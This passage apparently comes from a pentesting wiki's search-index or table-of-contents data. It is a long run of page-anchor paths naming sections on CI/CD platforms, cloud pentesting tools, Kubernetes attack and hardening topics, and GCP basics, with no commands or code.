cd/ansible-tower-awx-automation-controller-security.html#tech-stack","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#logical-components","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#job-execution-flow","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#awx-lab-creation-for-testing","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#rbac","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#supported-roles","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#enumeration--attack-path-mapping-with-ansiblehound","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#why-is-this-useful","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#prerequisites","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#building--running","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#bloodhound-transformation","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#defensive--offensive-considerations","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#references","pentesting-ci-cd/vercel-security.html#vercel","pentesting-ci-cd/vercel-security.html#basic-information","pentesting-ci-cd/vercel-security.html#project-settings","pentesting-ci-cd/vercel-security.html#general","pentesting-ci-cd/vercel-security.html#domains","pentesting-ci-cd/vercel-security.html#environments","pentesting-ci-cd/vercel-security.html#environment-variables","pentesting-ci-cd/vercel-security.html#git","pentesting-ci-cd/vercel-security.html#integrations","pentesting-ci-cd/vercel-security.html#deployment-protection","pentesting-ci-cd/vercel-security.html#functions","pentesting-ci-cd/vercel-security.html#data-cache","pentesting-ci-cd/vercel-security.html#cron-jobs","pentesting-ci-cd/vercel-security.html#log-drains","pentesting-ci-cd/vercel-security.html#security","pentesting-ci-cd/vercel-security.html#advanced","pentesting-ci-cd/vercel-security.html#project-firewall","pentesting-ci-cd/vercel-security.html#firewall","pentesting-ci-cd/vercel-security.html#custom-rules--ip-blocking","pentesting-ci-cd/vercel-security.html#project-deployment","pentesting-ci-cd/vercel-security.html#source","pentesting-ci-cd/vercel-security.html#skew-protection","pentesting-ci-cd/vercel-security.html#team-settings","pentesting-ci-cd/vercel-security.html#general-1","pentesting-ci-cd/vercel-security.html#billing","pentesting-ci-cd/vercel-security.html#members","pentesting-ci-cd/vercel-security.html#access-groups","pentesting-ci-cd/vercel-security.html#log-drains-1","pentesting-ci-cd/vercel-security.html#security--privacy","pentesting-ci-cd/vercel-security.html#secure-compute","pentesting-ci-cd/vercel-security.html#environment-variables-1","pentesting-ci-cd/todo.html#todo","pentesting-cloud/pentesting-cloud-methodology.html#pentesting-cloud-methodology","pentesting-cloud/pentesting-cloud-methodology.html#basic-methodology","pentesting-cloud/pentesting-cloud-methodology.html#multi-cloud-tools","pentesting-cloud/pentesting-cloud-methodology.html#purplepanda","pentesting-cloud/pentesting-cloud-methodology.html#prowler","pentesting-cloud/pentesting-cloud-methodology.html#cloudsploit","pentesting-cloud/pentesting-cloud-methodology.html#scoutsuite","pentesting-cloud/pentesting-cloud-methodology.html#steampipe","pentesting-cloud/pentesting-cloud-methodology.html#cs-suite","pentesting-cloud/pentesting-cloud-methodology.html#nessus","pentesting-cloud/pentesting-cloud-methodology.html#cloudlist","pentesting-cloud/pentesting-cloud-methodology.html#cartography","pentesting-cloud/pentesting-cloud-methodology.html#starbase","pentesting-cloud/pentesting-cloud-methodology.html#skyark","pentesting-cloud/pentesting-cloud-methodology.html#cloud-brute","pentesting-cloud/pentesting-cloud-methodology.html#cloudfox","pentesting-cloud/pentesting-cloud-methodology.html#more-lists-of-cloud-security-tools","pentesting-cloud/pentesting-cloud-methodology.html#google","pentesting-cloud/pentesting-cloud-methodology.html#gcp","pentesting-cloud/pentesting-cloud-methodology.html#workspace","pentesting-cloud/pentesting-cloud-methodology.html#aws","pentesting-cloud/pentesting-cloud-methodology.html#azure","pentesting-cloud/pentesting-cloud-methodology.html#attack-graph","pentesting-cloud/pentesting-cloud-methodology.html#office365","pentesting-cloud/kubernetes-security/index.html#kubernetes-pentesting","pentesting-cloud/kubernetes-security/index.html#kubernetes-basics","pentesting-cloud/kubernetes-security/index.html#labs-to-practice-and-learn","pentesting-cloud/kubernetes-security/index.html#hardening-kubernetes--automatic-tools","pentesting-cloud/kubernetes-security/index.html#manual-kubernetes-pentest","pentesting-cloud/kubernetes-security/index.html#from-the-outside","pentesting-cloud/kubernetes-security/index.html#enumeration-inside-a-pod","pentesting-cloud/kubernetes-security/index.html#enumerating-kubernetes-with-credentials","pentesting-cloud/kubernetes-security/index.html#privesc-to-a-different-namespace","pentesting-cloud/kubernetes-security/index.html#from-kubernetes-to-the-cloud","pentesting-cloud/kubernetes-security/kubernetes-basics.html#kubernetes-basics","pentesting-cloud/kubernetes-security/kubernetes-basics.html#architecture--basics","pentesting-cloud/kubernetes-security/kubernetes-basics.html#what-does-kubernetes-do","pentesting-cloud/kubernetes-security/kubernetes-basics.html#architecture","pentesting-cloud/kubernetes-security/kubernetes-basics.html#pki-infrastructure---certificate-authority-ca","pentesting-cloud/kubernetes-security/kubernetes-basics.html#basic-actions","pentesting-cloud/kubernetes-security/kubernetes-basics.html#minikube","pentesting-cloud/kubernetes-security/kubernetes-basics.html#kubectl-basics","pentesting-cloud/kubernetes-security/kubernetes-basics.html#minikube-dashboard","pentesting-cloud/kubernetes-security/kubernetes-basics.html#yaml-configuration-files-examples","pentesting-cloud/kubernetes-security/kubernetes-basics.html#namespaces","pentesting-cloud/kubernetes-security/kubernetes-basics.html#helm","pentesting-cloud/kubernetes-security/kubernetes-basics.html#kubernetes-secrets","pentesting-cloud/kubernetes-security/kubernetes-basics.html#secrets-in-etcd","pentesting-cloud/kubernetes-security/kubernetes-basics.html#references","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#pentesting-kubernetes-services","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#finding-exposed-pods-with-osint","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#how-kubernetes-exposes-services","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#finding-exposed-pods-via-port-scanning","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#nmap","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#kube-apiserver","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#kubelet-api","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#etcd-api","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#tiller","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#cadvisor","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#nodeport","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#vulnerable-misconfigurations","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#kube-apiserver-anonymous-access","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#checking-for-etcd-anonymous-access","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#kubelet-rce","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#checking-kubelet-read-only-port-information-exposure","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#references","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#kubelet-authentication--authorization","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#kubelet-authentication","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#kubelet-authorization","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#references","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#exposing-services-in-kubernetes","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#automatic-enumeration","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#clusterip","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#nodeport","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#loadbalancer","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#external-ips","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#externalname","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#ingress","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#references","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#attacking-kubernetes-from-inside-a-pod","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#pod-breakout","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#escaping-from-the-pod","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#abusing-kubernetes-privileges","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#abusing-cloud-privileges","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#search-vulnerable-network-services","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#services","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#scanning","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#sniffing","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#network-spoofing","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#node-dos","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#node-post-exploitation","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#find-node-kubeconfig","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#steal-secrets","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#privileged-daemonsets","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#pivot-to-cloud","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#steal-etcd","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#staticmirrored-pods-persistence","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#delete-pods--unschedulable-nodes","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#automatic-tools","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#kubernetes-enumeration","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#kubernetes-tokens","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#service-account-tokens","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#hot-pods","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#rbac","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#gui-applications","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#enumeration-cheatsheet","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#differences-between-list-and-get-verbs","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#using-curl","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#using-kubectl","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#current-configuration","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-supported-resources","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-current-privileges","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-others-roles","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-namespaces","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-secrets","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-service-accounts","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-deployments","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-pods","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-services","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-nodes","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-daemonsets","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-cronjob","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-configmap","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-network-policies--cilium-network-policies","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-everything--all","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-all-resources-managed-by-helm","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#get-pods-consumptions","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#interacting-with-the-cluster-without-using-kubectl","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#escaping-from-the-pod","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#creating-a-privileged-pod","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#delete-a-pod","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#create-a-service-account","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#delete-a-service-account","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#create-a-role","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#delete-a-role","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#create-a-role-binding","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#delete-a-role-binding","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#delete-a-secret","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#delete-a-secret-1","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#references","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#kubernetes-role-based-access-controlrbac","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#role-based-access-control-rbac","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#templates","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#rules-verbs","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#examples","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#rolebinding-and-clusterrolebinding","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#enumerating-rbac","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#abuse-roleclusterroles-for-privilege-escalation","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#abusing-rolesclusterroles-in-kubernetes","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#privilege-escalation","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#access-any-resource-or-verb-wildcard","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#access-any-resource-with-a-specific-verb","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#pod-create---steal-token","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#pod-create--escape","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#pod-create---move-to-cloud","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#createpatch-deployment-daemonsets-statefulsets-replicationcontrollers-replicasets-jobs-and-cronjobs","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#pods-exec","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#port-forward","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#hosts-writable-varlog-escape","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#impersonating-privileged-accounts","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#listing-secrets","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#creating-and-reading-secrets","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#reading-a-secret--brute-forcing-token-ids","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#encrpytionconfiguration-in-clear-text","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#certificate-signing-requests","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#aws-eks-aws-auth-configmaps","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#coredns-config-map","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#escalating-in-gke","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#create-serviceaccounts-token","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#ephemeralcontainers","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#validatingwebhookconfigurations-or-mutatingwebhookconfigurations","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#escalate","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#nodes-proxy","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#delete-pods--unschedulable-nodes","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#services-status-cve-2020-8554","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#nodes-and-pods-status","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#built-in-privileged-escalation-prevention","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#get--patch-rolebindingsclusterrolebindings","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#other-attacks","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#sidecar-proxy-app","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#malicious-admission-controller","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#opa-gatekeeper-bypass","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#best-practices","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#disabling-automount-of-service-account-tokens","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#restrictive-user-assignment-in-rolebindingsclusterrolebindings","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#namespace-specific-roles-over-cluster-wide-roles","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#use-automated-tools","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#references","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.html#pod-escape-privileges","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.html#privileged-and-hostpid","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#kubernetes-roles-abuse-lab","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#pod-creation---escalate-to-ns-sas","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#create-daemonset","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#patch-daemonset","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#doesnt-work","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#createpatch-bindings","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#bind-explicitly-bindings","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#arbitrary-roles-creation","pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.html#kubernetes-namespace-escalation","pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.html#abuse-k8s-privileges","pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.html#escape-to-the-node","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#external-secret-operator","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#disclaimer","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#prerequisites","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#gathering-information-about-existing-clustersecretstore","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#externalsecret-enumeration","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#assembling-the-pieces","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#references","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#kubernetes-pivoting-to-clouds","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#gcp","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#mounting-gcp-sa-keys-as-secret","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#relating-gsa-json-to-ksa-secret","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#gke-workload-identity","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#aws","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#kiam--kube2iam-iam-role-for-pods","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#iam-role-for-k8s-service-accounts-via-oidc","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#find-pods-a-sas-with-iam-roles-in-the-cluster","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#node-iam-role-to-cluster-admin","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#steal-iam-role-token","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#privesc-to-cluster-admin","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#references","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#kubernetes-network-attacks","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#introduction","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#basic-kubernetes-networking","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#arp","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#dns","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#arp-spoofing-in-pods-in-the-same-node","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#scapy","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#arpspoof","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#dns-spoofing","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#dns-spoofing-via-coredns-configmap","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#abusing-exposed-kubernetes-management-services","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#enumerating-kubernetes-network-policies","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#capturing-traffic","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#references","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubernetes-hardening","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#tools-to-analyse-a-cluster","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#steampipe---kubernetes-compliance","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubescape","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#popeye","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kube-bench","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubeaudit","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kube-hunter","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#trivy","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubei","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubiscan","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#managed-kubernetes-auditing-toolkit","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#audit-iac-code","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kics","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#checkov","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kube-score","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#tips","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubernetes-podsecuritycontext-and-securitycontext","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubernetes-api-hardening","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#securitycontext-hardening","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#general-hardening","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubernetes-monitoring--security","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#kubernetes-securitycontexts","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#podsecuritycontext","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#securitycontext","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#references","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#kubernetes---opa-gatekeeper","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#definition","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#apply-constraint","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#references","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#kubernetes-opa-gatekeeper-bypass","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#abusing-misconfiguration","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#enumerate-rules","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#excluded-namespaces","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#bypass","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#abusing-validatingwebhookconfiguration","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#references","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#kubernetes-kyverno","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#definition","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#use-cases","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#example-clusterpolicy-and-policy","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#references","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#kubernetes-kyverno-bypass","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#abusing-policies-misconfiguration","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#enumerate-rules","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#enumerate-excluded","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#example","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#abusing-validatingwebhookconfiguration","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#more-info","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#kubernetes-validatingwebhookconfiguration","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#definition","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#purpose","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#enumeration","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#abusing-kyverno-and-gatekeeper-vwc","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#use-case","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#references","pentesting-cloud/gcp-security/index.html#gcp-pentesting","pentesting-cloud/gcp-security/index.html#basic-information","pentesting-cloud/gcp-security/index.html#labs-to-learn","pentesting-cloud/gcp-security/index.html#gcp-pentesterred-team-methodology","pentesting-cloud/gcp-security/index.html#basic-enumeration","pentesting-cloud/gcp-security/index.html#ssrf","pentesting-cloud/gcp-security/index.html#whoami","pentesting-cloud/gcp-security/index.html#org-enumeration","pentesting-cloud/gcp-security/index.html#principals--iam-enumeration","pentesting-cloud/gcp-security/index.html#services-enumeration","pentesting-cloud/gcp-security/index.html#privilege-escalation-post-exploitation--persistence","pentesting-cloud/gcp-security/index.html#publicly-exposed-services","pentesting-cloud/gcp-security/index.html#gcp--workspace-pivoting","pentesting-cloud/gcp-security/index.html#automatic-tools","pentesting-cloud/gcp-security/index.html#gcloud-config--debug","pentesting-cloud/gcp-security/index.html#capture-gcloud-gsutil-network","pentesting-cloud/gcp-security/index.html#oauth-token-configure-in-gcloud","pentesting-cloud/gcp-security/index.html#references","pentesting-cloud/gcp-security/gcp-basic-information/index.html#gcp---basic-information","pentesting-cloud/gcp-security/gcp-basic-information/index.html#resource-hierarchy","pentesting-cloud/gcp-security/gcp-basic-information/index.html#projects-migration","pentesting-cloud/gcp-security/gcp-basic-information/index.html#organization-policies","pentesting-cloud/gcp-security/gcp-basic-information/index.html#default-organization-policies","pentesting-cloud/gcp-security/gcp-basic-information/index.html#iam-roles","pentesting-cloud/gcp-security/gc